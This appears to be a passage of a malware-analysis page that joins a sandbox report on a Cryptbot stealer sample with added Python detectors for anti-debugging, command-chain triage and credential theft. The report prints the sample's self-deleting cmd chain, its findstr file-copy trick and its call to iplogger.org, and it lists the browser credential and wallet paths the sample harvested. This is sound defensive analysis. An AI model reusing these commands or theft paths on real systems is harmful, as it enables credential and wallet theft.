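    r"Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Thread information set: HideFromDebugger Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process queried: DebugPort Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process queried: DebugObjectHandle Jump to behavior",
    r"Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0042B021 mov eax, dword ptr fs:[00000030h] 0_2_0042B021",
    r"Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
]

EVENT_RE = re.compile(r"^Source: (?P<proc>.+?\.(?:exe|com|dll)) (?P<event>[^:]+): ?(?P<detail>.*)$")
JUMP_SUFFIX = "Jump to behavior"  # link residue the report appends to some lines

# Window class / title names the sample probes (copied from the report); a
# FindWindow-style lookup of any of these is a tool-detection attempt.
ANALYSIS_WINDOWS = {
    "regmonclass", "filemonclass", "procmon_window_class",
    "process monitor - sysinternals: www.sysinternals.com",
    "registry monitor - sysinternals: www.sysinternals.com",
    "file monitor - sysinternals: www.sysinternals.com",
}
DISPLAY_CLASS_GUID = "{4d36e968-e325-11ce-bfc1-08002be10318}"  # display-adapter device class
LONG_SLEEP_MS = 3 * 60 * 1000  # the report's ">= 3 min" threshold; assumes ms units


def parse_event(line):
    """Return (process image, event type, detail) or None for non-evidence lines."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    detail = m["detail"].strip()
    if detail.endswith(JUMP_SUFFIX):
        detail = detail[: -len(JUMP_SUFFIX)].rstrip()
    return m["proc"], m["event"].strip(), detail


def delay_ms(detail):
    m = re.search(r"delay time: (\d+)", detail)
    return int(m.group(1)) if m else 0


# (technique tag, event type it applies to, predicate on the detail text)
RULES = [
    ("anti-vm:bios-fingerprint", "Registry key queried",
     lambda d: d.endswith(("name: SystemBiosVersion", "name: VideoBiosVersion"))),
    ("anti-vm:display-adapter", "Registry key queried",
     lambda d: DISPLAY_CLASS_GUID in d.lower() and d.endswith("name: DriverDesc")),
    ("anti-analysis:tool-window", "Open window title or class name",
     lambda d: d.lower() in ANALYSIS_WINDOWS),
    ("anti-debug:hide-thread", "Thread information set",
     lambda d: d == "HideFromDebugger"),
    ("anti-debug:debug-port", "Process queried",
     lambda d: d in ("DebugPort", "DebugObjectHandle")),
    ("anti-debug:peb-read", "Code function",          # fs:[30h] is the PEB pointer on x86
     lambda d: "fs:[00000030h]" in d.lower()),
    ("evasion:long-sleep", "Thread delayed",
     lambda d: delay_ms(d) >= LONG_SLEEP_MS),
    ("recon:installed-software", "Registry key enumerated",
     lambda d: d.endswith(r"CurrentVersion\Uninstall")),
]


def classify(lines):
    """Map each process image to the sorted list of technique tags it triggered."""
    found = defaultdict(set)
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        proc, event, detail = parsed
        for technique, wanted_event, matches in RULES:
            if event == wanted_event and matches(detail):
                found[proc].add(technique)
    return {proc: sorted(t) for proc, t in found.items()}


def evasive_processes(lines, min_families=2):
    """Processes that combine at least `min_families` distinct technique families."""
    result = []
    for proc, techniques in classify(lines).items():
        families = {t.split(":")[0] for t in techniques}
        if len(families) >= min_families:
            result.append(proc)
    return sorted(result)


if __name__ == "__main__":
    for proc, techniques in classify(SAMPLE_EVENTS).items():
        print(proc, "->", ", ".join(techniques))
```

Run against the sample lines, IntelRapid.exe collects the VM-fingerprint, tool-window and long-sleep tags, parted.exe the two debugger-detection tags, and the submitted binary the PEB read plus the installed-software sweep; requiring two distinct families before flagging keeps a lone IsDebuggerPresent call from the CRT startup code (as in 0_2_00417261 above) from scoring on its own.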

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\wscript.exe Domain query: iplogger.org
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 88.99.66.31 187
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Process created: C:\Users\user\AppData\Local\Temp\File.exe 'C:\Users\user~1\AppData\Local\Temp\File.exe' Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 4 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Bisogna.exe.com l Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E1808 LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary, 13_2_004E1808
Source: Bel.wav.13.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
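The process chain above packs several of the report's signatures into a few command lines: cmd.exe removes the staging directory, waits with timeout, then deletes the parent image (self deletion via cmd delete); findstr /V with an anchored pattern that can never occur prints every line of Bel.wav unchanged, which turns a text-search tool into a file copy (the report does not show where that output was redirected, so no target is claimed here); ping 127.0.0.1 is a second sleep; Bisogna.exe.com carries a misleading double extension; and WScript.exe runs a .vbs dropped in Temp (the Sigma rules "Suspicious Script Execution From Temp Folder" and "WScript or CScript Dropper"). The Python below is an added example for this page, not Joe Sandbox code and not code from the sample: it splits each command line into its chained commands and reports these patterns. The pairs are copied from the report, which prints the original double quotes as single quotes; the tokenizer accepts both. Matching an 8.3 short name such as user~1 against the long name by prefix is a heuristic, not a real short-name resolution.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample: (parent image, child command line) pairs copied from the
# "Creates a process in suspended mode" evidence above.
SAMPLE_CHAIN = [
    (r"C:\Users\user\Desktop\7yyqdBJVGf.exe",
     r"'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'"),
    (r"C:\Windows\SysWOW64\cmd.exe",
     "findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav"),
    (r"C:\Windows\SysWOW64\cmd.exe", "Bisogna.exe.com l"),
    (r"C:\Windows\SysWOW64\cmd.exe", "ping 127.0.0.1"),
    (r"C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com",
     r"'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'"),
]
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh")


def split_chain(cmdline):
    """Split a cmd.exe line on &, &&, | and || that sit outside quotes."""
    parts, buf, quote, i = [], [], None, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if quote:
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
            buf.append(ch)
        elif ch in "&|":
            parts.append("".join(buf))
            buf = []
            if i + 1 < len(cmdline) and cmdline[i + 1] == ch:  # && or ||
                i += 1
        else:
            buf.append(ch)
        i += 1
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]


def tokenize(cmd):
    """Whitespace-split, keeping quoted spans whole and dropping their quotes."""
    return [t[1:-1] if len(t) > 1 and t[0] in "\"'" and t[-1] == t[0] else t
            for t in re.findall(r"'[^']*'|\"[^\"]*\"|\S+", cmd)]


def same_path(a, b):
    """Case-insensitive path equality; a short-name component (user~1) is
    matched by its prefix because the log mixes short and long forms (heuristic)."""
    pa, pb = PureWindowsPath(a).parts, PureWindowsPath(b).parts
    if len(pa) != len(pb):
        return False
    for x, y in zip(pa, pb):
        x, y = x.lower(), y.lower()
        if x == y:
            continue
        for short, full in ((x, y), (y, x)):
            m = re.fullmatch(r"(.+)~\d+", short)
            if m and full.startswith(m.group(1)):
                break
        else:
            return False
    return True


def is_findstr_copy(args):
    """findstr /V with an anchored random literal never matches, so every input
    line is printed unchanged: a file copy disguised as a search."""
    return any(a.lower() == "/v" for a in args) and \
        any(re.fullmatch(r"\^[A-Za-z0-9]{20,}\$", a) for a in args)


def analyze_command(parent_image, cmdline):
    findings = []
    for cmd in split_chain(cmdline):
        toks = tokenize(cmd)
        if not toks:
            continue
        if toks[0].lower().endswith("cmd.exe") and len(toks) > 2 and toks[1].lower() in ("/c", "/k"):
            toks = toks[2:]  # unwrap "cmd.exe /c <command>"
        verb, args = PureWindowsPath(toks[0]).name.lower(), toks[1:]
        targets = [a for a in args if not a.startswith("/")]
        if verb in ("del", "erase") and any(same_path(t, parent_image) for t in targets):
            findings.append("self-delete: child deletes the parent's image")
        elif verb in ("rd", "rmdir") and any("\\temp\\" in t.lower() for t in targets):
            findings.append("cleanup: staging directory under Temp removed")
        elif verb in ("timeout", "timeout.exe") or (verb in ("ping", "ping.exe") and "127.0.0.1" in targets):
            findings.append(f"delay: {verb} used as a sleep")
        elif verb in ("findstr", "findstr.exe") and is_findstr_copy(args):
            findings.append("findstr /V with unmatchable anchored regex: file copy, not a search")
        elif verb in ("wscript.exe", "cscript.exe", "wscript", "cscript") and any(
                "\\appdata\\local\\temp\\" in t.lower() and t.lower().endswith(SCRIPT_EXT) for t in targets):
            findings.append("script host runs a script dropped in Temp")
        if re.search(r"\.(?:exe|scr|bat|cmd)\.\w+$", verb):
            findings.append(f"double extension: {verb}")
    return findings


def triage(chain):
    return [(parent, cmdline, analyze_command(parent, cmdline)) for parent, cmdline in chain]


if __name__ == "__main__":
    for parent, cmdline, findings in triage(SAMPLE_CHAIN):
        print(PureWindowsPath(parent).name, "->", cmdline[:60], findings)
```

The self-delete test compares the del target with the image of the process that spawned cmd.exe, which is the relation a process-creation event carries and a plain command-line regex cannot express; the findstr check looks for the combination of /V and a long anchored literal rather than for any particular pattern, since the literal is randomised per sample.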

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW, 0_2_0040E340
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_cookies.db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_key.bin VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_logins.db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_webdata.db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Information.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Screen_Desktop.jpeg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\screenshot.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\system_info.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_cookies.db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_key.bin VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_logins.db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_webdata.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00417091 cpuid 0_2_00417091
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00414240 SetFilePointer,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_00414240
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0042A574 _free,_free,_free,GetTimeZoneInformation,_free, 0_2_0042A574
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW, 0_2_0040E340
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 10_2_00406831

Stealing of Sensitive Information:

Yara detected Cryptbot
Source: Yara match File source: 0.2.7yyqdBJVGf.exe.3080e50.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.7yyqdBJVGf.exe.30d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7yyqdBJVGf.exe.3080e50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7yyqdBJVGf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.7yyqdBJVGf.exe.30d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7yyqdBJVGf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.316198160.0000000003080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.251202902.00000000030D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR
Yara detected Glupteba
Source: Yara match File source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 7yyqdBJVGf.exe String found in binary or memory: %AppData%\Electrum-btcp\wallets
Source: 7yyqdBJVGf.exe String found in binary or memory: %AppData%\ElectronCash\wallets
Source: 7yyqdBJVGf.exe String found in binary or memory: %AppData%\Jaxx\Local Storage
Source: 7yyqdBJVGf.exe String found in binary or memory: %AppData%\Exodus\backup
Source: 7yyqdBJVGf.exe String found in binary or memory: %AppData%\Exodus\backup
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
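Read together, the evidence in this section and the staging paths listed under "Queries the volume information" above describe a classic stealer pass: a non-browser process opens Chrome's Login Data, Cookies and Web Data, walks the Local Extension Settings stores of wallet extensions, reads Firefox's profiles.ini, and parks copies (default_logins.db, default_cookies.db, default_webdata.db, default_key.bin) in a Temp staging directory next to a screenshot and a system-info text file. The Python below is an added example for this page, not Joe Sandbox code and not code from the sample: it summarises that behaviour per process image and gives a verdict. Sample lines are copied from the report except for one constructed control line (chrome.exe reading its own profile) that must not fire. Only MetaMask's extension ID is mapped by name; the other IDs on the page are reported as unmapped rather than guessed. Records are keyed by image name because the report's string evidence names the binary without its path.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample: evidence copied from the report above, plus one benign
# control line (chrome.exe reading its own profile) that is not from the report.
SAMPLE_EVENTS = [
    r"Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior",
    r"Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior",
    r"Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior",
    r"Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior",
    r"Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior",
    r"Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior",
    r"Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_logins.db VolumeInformation Jump to behavior",
    r"Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_key.bin VolumeInformation Jump to behavior",
    r"Source: 7yyqdBJVGf.exe String found in binary or memory: %AppData%\Exodus\backup",
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
]

EVENT_RE = re.compile(r"^Source: (?P<proc>.+?\.(?:exe|com|dll)) (?P<event>[^:]+): ?(?P<detail>.*)$")
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "firefox.exe"}
CHROME_ARTIFACTS = {"login data", "cookies", "web data", "history", "local state"}
# Chromium extension IDs are 32 letters from a-p, stored under "Local Extension Settings\<id>".
EXT_ID_RE = re.compile(r"\\local extension settings\\([a-p]{32})$")
KNOWN_WALLET_EXTENSIONS = {"nkbihfbeogaeaoehlefnkodbefgpgknn": "MetaMask"}  # extend as verified
WALLET_DIR_MARKERS = ("\\electrum", "\\electroncash", "\\jaxx\\local storage", "\\exodus")
# Browser DB copies parked under Temp, named as in the report's staging directory.
STAGED_COPY_RE = re.compile(r"\\appdata\\local\\temp\\.*\\(default_(?:cookies|logins|webdata)\.db|default_key\.bin)$")


def new_record():
    return {"browser_artifacts": set(), "extensions": {}, "wallet_dirs": set(), "staged_copies": set()}


def summarize(lines):
    """Per image name: which credential stores, extension stores, wallet
    directories and staged copies a non-browser process touched."""
    out = defaultdict(new_record)
    for line in lines:
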